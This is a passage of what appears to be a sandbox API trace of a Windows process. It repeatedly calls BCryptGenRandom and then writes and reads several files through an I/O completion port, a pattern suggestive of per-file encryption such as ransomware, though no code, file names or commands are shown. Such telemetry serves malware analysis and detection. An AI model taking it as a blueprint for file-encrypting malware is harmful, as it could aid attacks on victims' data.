lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0135.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0135.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0135.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0135.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0135.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0135.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0135.892] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0135.892] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0135.892] free (_Block=0x3e305b8) [0135.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0135.893] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0135.893] free (_Block=0x1fa91d0) [0135.893] free (_Block=0x77d7a8) [0135.893] free (_Block=0x1fa90b8) [0135.893] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0135.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0135.941] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0135.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0135.942] CloseHandle (hObject=0x308) returned 1 [0135.943] free (_Block=0x3df0008) [0135.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0136.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0136.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0136.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0136.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0136.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0136.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0136.002] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0136.002] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0136.002] free (_Block=0x3e305b8) [0136.002] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0136.002] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0136.003] free (_Block=0x1fa91d0) [0136.003] free (_Block=0x77d7a8) [0136.003] free (_Block=0x1fa90b8) [0136.003] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0136.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0136.061] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0136.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0136.062] CloseHandle (hObject=0x308) returned 1 [0136.062] free (_Block=0x3df0008) [0136.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0136.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0136.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0136.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0136.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0136.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0136.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0136.156] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0136.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0136.156] free (_Block=0x3e305b8) [0136.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0136.157] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0136.157] free (_Block=0x1fa91d0) [0136.157] free (_Block=0x77d7a8) [0136.157] free (_Block=0x1fa90b8) [0136.157] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0136.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0137.979] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0137.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0137.982] CloseHandle (hObject=0x308) returned 1 [0137.982] free (_Block=0x3df0008) [0137.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.063] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.063] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.063] free (_Block=0x3e305b8) [0138.063] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.063] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.064] free (_Block=0x1fa91d0) [0138.064] free (_Block=0x77d7a8) [0138.064] free (_Block=0x1fa90b8) [0138.064] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.151] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.154] CloseHandle (hObject=0x308) returned 1 [0138.155] free (_Block=0x3df0008) [0138.155] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.181] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.181] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.181] free (_Block=0x3e305b8) [0138.181] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.181] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.181] free (_Block=0x1fa91d0) [0138.182] free (_Block=0x77d7a8) [0138.182] free (_Block=0x1fa90b8) [0138.182] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.183] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.308] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3e74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.309] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.309] CloseHandle (hObject=0x308) returned 1 [0138.310] free (_Block=0x3df0008) [0138.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.325] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.325] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.325] free (_Block=0x3e305b8) [0138.325] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.325] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.325] free (_Block=0x1fa91d0) [0138.325] free (_Block=0x77d7a8) [0138.325] free (_Block=0x1fa90b8) [0138.326] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.335] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.335] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.335] free (_Block=0x3e305b8) [0138.335] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.335] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.335] free (_Block=0x1fa91d0) [0138.335] free (_Block=0x77d7a8) [0138.335] free (_Block=0x1fa90b8) [0138.335] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.345] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.345] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.345] free (_Block=0x3e305b8) [0138.345] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.345] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.346] free (_Block=0x1fa91d0) [0138.346] free (_Block=0x77d7a8) [0138.346] free (_Block=0x1fa90b8) [0138.346] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.358] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.358] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.358] free (_Block=0x3e305b8) [0138.358] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.358] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.359] free (_Block=0x1fa91d0) [0138.359] free (_Block=0x77d7a8) [0138.359] free (_Block=0x1fa90b8) [0138.359] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.368] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.368] free (_Block=0x3e305b8) [0138.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.368] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.369] free (_Block=0x1fa91d0) [0138.369] free (_Block=0x77d7a8) [0138.369] free (_Block=0x1fa90b8) [0138.369] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.592] CloseHandle (hObject=0x308) returned 1 [0138.593] free (_Block=0x3e70008) [0138.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.603] CloseHandle (hObject=0x338) returned 1 [0138.604] free (_Block=0x3df0008) [0138.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.617] CloseHandle (hObject=0x170) returned 1 [0138.617] free (_Block=0x3ef0008) [0138.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.621] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x12bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.691] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.698] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.722] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.722] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.732] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f38, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.782] CloseHandle (hObject=0x170) returned 1 [0138.782] free (_Block=0x1ff1e60) [0138.782] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.796] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.796] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.796] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.796] free (_Block=0x3e305b8) [0138.796] calloc (_Count=0x41, _Size=0x4) returned 